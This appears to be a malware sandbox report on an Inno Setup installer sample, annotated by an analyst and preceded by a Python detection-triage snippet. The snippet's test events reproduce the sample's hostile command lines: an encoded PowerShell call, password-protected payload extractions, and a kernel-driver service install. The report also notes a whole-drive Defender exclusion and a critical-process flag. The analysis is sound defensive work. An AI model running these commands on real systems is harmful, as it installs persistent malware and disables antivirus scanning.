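    ProcEvent(9001, 6220, f"powershell.exe -enc {_ENCODED}"),
    ProcEvent(5560, 4828, "7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald"),
    ProcEvent(6496, 4828, "7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs"),
    ProcEvent(800, 5232, r'''sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto'''),
    ProcEvent(5552, 5892, "sc start CleverSoar"),  # three of the 32 "sc start" launches in the tree
    ProcEvent(2976, 1912, "sc start CleverSoar"),
    ProcEvent(4788, 2328, "sc start CleverSoar"),
]

if __name__ == "__main__":
    for f in triage(EVENTS):
        print(f"[{f.rule}] pid={f.pid} {f.detail}")
```

On a real host the `ProcEvent` fields map to Sysmon event ID 1 or Security event 4688 (CommandLine, ProcessId, ParentProcessId). The base64 Sigma rule that matched here works the other way round, by searching for the three offset-shifted base64 encodings of the cmdlet name inside the command line; decoding the payload, as above, also covers `-ec` and whatever else follows the cmdlet, at the cost of having to recognise the encoded-command switch. The whole-drive exclusion is the finding to escalate first: once `C:\` is excluded, every later stage, including tProtect.dll and the .dat payloads, is outside Defender's scanning.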


AV Detection

Source: Submitted Sample; Integrated Neural Analysis Model: Matched 80.3% probability
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb; found in: 7zr.exe, 0000000C.00000003.2189179691.0000000003720000.00000004.00001000.00020000.00000000.sdmp; 7zr.exe, 0000000C.00000003.2188798294.0000000003520000.00000004.00001000.00020000.00000000.sdmp; tProtect.dll.12.dr. This PDB path belongs to tProtect.dll, the file that the sc create command in the process tree registers as the CleverSoar kernel service. It was written by process 12 (one of the 7zr.exe extractions) and is a 64-bit (amd64) driver build whose internal name is TfSysMon, so its .dll extension does not match its content (compare the "Drops files with a non-matching file extension" signature above).
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp; Code function: 6_2_6CC3AEC0 FindFirstFileA,FindClose,FindClose
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 10_2_00E96868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 10_2_00E97496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW
Strings found in binary or memory. These are strings, not observed connections: the DigiCert entries are the certificate-chain (CA, CRL, OCSP and CPS) URLs embedded in the Authenticode signature blocks of the files listed, and the stray characters after some URLs (0E, 0C, 07, 0J, ...) are bytes of the surrounding DER structure that the string extractor pulled in, not part of the URL.
Sources: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000002.00000003.2139409972.0000000003C40000.00000004.00001000.00020000.00000000.sdmp; #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp; 7zr.exe.6.dr; hrsw.vbc.6.dr; update.vac.2.dr; update.vac.6.dr
  • http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
  • http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
  • http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
  • http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
  • http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
  • http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
  • http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
  • http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
  • http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
  • http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
  • http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
  • http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
  • http://ocsp.digicert.com0A
  • http://ocsp.digicert.com0C
  • http://ocsp.digicert.com0H
  • http://ocsp.digicert.com0I
  • http://ocsp.digicert.com0X
  • http://www.digicert.com/CPS0
  • http://www.digicert.com/ssl-cps-repository.htm0
Sources: #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000002.2318621011.0000000004679000.00000004.00001000.00020000.00000000.sdmp; is-EIO1L.tmp.6.dr (help and issue-tracker text of the aria2 download utility, so is-EIO1L.tmp carries an aria2 build; the suffixes "basic_string::_M_construct", "Usage:" and "Report" are adjacent strings run together by the extractor)
  • http://www.metalinker.org/
  • http://www.metalinker.org/basic_string::_M_construct
  • https://aria2.github.io/
  • https://aria2.github.io/Usage:
  • https://github.com/aria2/aria2/issues
  • https://github.com/aria2/aria2/issuesReport
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exe
  • https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Sources: #U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.2126523988.0000000002FC0000.00000004.00001000.00020000.00000000.sdmp; #U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.2126982219.000000007EF1B000.00000004.00001000.00020000.00000000.sdmp; #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000002.00000000.2129128970.0000000000491000.00000020.00000001.01000000.00000004.sdmp; #U5b89#U88c5#U52a9#U624b1.0.2.tmp, 00000006.00000000.2150311602.0000000000DAD000.00000020.00000001.01000000.00000008.sdmp; #U5b89#U88c5#U52a9#U624b1.0.2.tmp.0.dr; #U5b89#U88c5#U52a9#U624b1.0.2.tmp.5.dr (Inno Setup installer strings; the /SL5= switch and the is-XXXXX.tmp directories in the process tree are Inno Setup's, which makes the sample an Inno Setup package wrapping the payload)
  • https://www.innosetup.com/
  • https://www.remobjects.com/ps

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp; Process information set: 01 00 00 00 (the little-endian DWORD 1; this is the BreakOnTermination flag being enabled on the process, the behaviour behind the "Protects its processes via BreakOnTermination flag" signature above: a process marked this way is treated as critical, so killing it, for instance from an EDR response action, brings the system down, which is why the report files it under Operating System Destruction)

System Summary

Source: update.vac.2.dr | Static PE information: section name: .=~
Source: hrsw.vbc.6.dr | Static PE information: section name: .=~
Source: update.vac.6.dr | Static PE information: section name: .=~
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CAC3886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CC45120 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CAC3C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CC45D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CAC3D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CAC3D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CAC39CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CAC3A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CAC1950 CreateFileA,DeviceIoControl,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CAC4754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CAC4754
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CAD4A27
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CC41880
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CC46A43
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CCA6CE0
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CD14DE0
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CCF6D10
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CC92EC9
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CCCAEEF
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CCFEEF0
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CC78EA1
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CD0C8D0
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CCC4896
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CD14870
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CCEE810
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CD06820
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CD16999
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CD08950
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CC78972
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CCF6900
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CD0A930
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CD04AA0
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CCD0A52
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CC80BCA
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CD0EBC0
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CCEAB90
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CC90B66
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CCFE4D0
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CD04489
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CCD84AC
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CCF45D0
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CCF2580
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CCFC580
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CCE2521
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CD08520
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CD146C0
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CD0E600
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CC7C7CF
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CD167C0
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CCDC7F3
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CD067A0
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CCFE0E0
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CCF0020
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CD0C2A0
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CD08200
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CD15D90
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CCC7D43
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CCF3D50
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CCF9E80
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CCD1F11
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CD078C8
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CCE589F
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CCF99F0
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CCEDAD0
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CCF1AA0
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CCEFA50
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CC9540A
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CCFF5C0
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CCBF5EC
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CCF96E0
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CD0F640
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CCEB650
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CD137C0
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CD19700
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CC93092
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CCFF050
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CCF71F0
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CCFD280
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CCFD380
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CD06AF0
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CD03750
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00ED81EC
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F181C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F04250
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F28240
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F2C3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F204C8
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F08650
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F0C950
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00EE0943
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F08C20
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F24EA0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F20E00
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00EF10AC
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F1D089
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F0D1D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F291C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F15180
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F21120
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F2D2C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00EF53F3
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00E953CF
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F254D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00EDD496
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F2D470
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00E91572
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F21550
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F1D6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00EE9652
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00E997CA
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00EA9766
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F2D9E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00E91AA1
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F15E80
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F15F80
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00EAE00A
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F122E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F32300
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00EFE49F
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F125F0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F066D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F0A6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F2E990
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F12A80
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00EEAB11
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F16CE0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F170D0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F0B180
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00EFB121
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F27200
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00EBB3E4
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F2F3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F1F3A0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F1F420
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F07410
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F2F599
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F23530
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F3351A
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F0F500
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F33601
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F277C0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F03790
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00EBF8E0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F0F910
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00EE3AEF
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F17AF0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00EABAC9
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00EABC92
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F17C50
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00F0FDF0
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process token adjusted: Security
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: String function: 6CD16F10 appears 727 times
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: String function: 6CC79240 appears 53 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 00E91E40 appears 151 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 00F2FB10 appears 723 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 00E928E3 appears 34 times
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp.5.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exe | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp.0.dr | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b1.0.2.tmp.5.dr | Static PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000000.2124833248.0000000000E99000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b1.0.2.exe
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.2126982219.000000007F21A000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b1.0.2.exe
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.2126523988.00000000030DE000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b1.0.2.exe
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exe | Binary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b1.0.2.exe
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.12.dr | Binary string: \Device\TfSysMon
Source: tProtect.dll.12.dr | Binary string: \Device\TfKbMonPWLCache
Source: classification engine | Classification label: mal80.evad.winEXE@135/32@0/0
Source: C:\Users\user\AppData\Local\Temp\is-AUEJT.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Code function: 6_2_6CC45D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00E99313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle
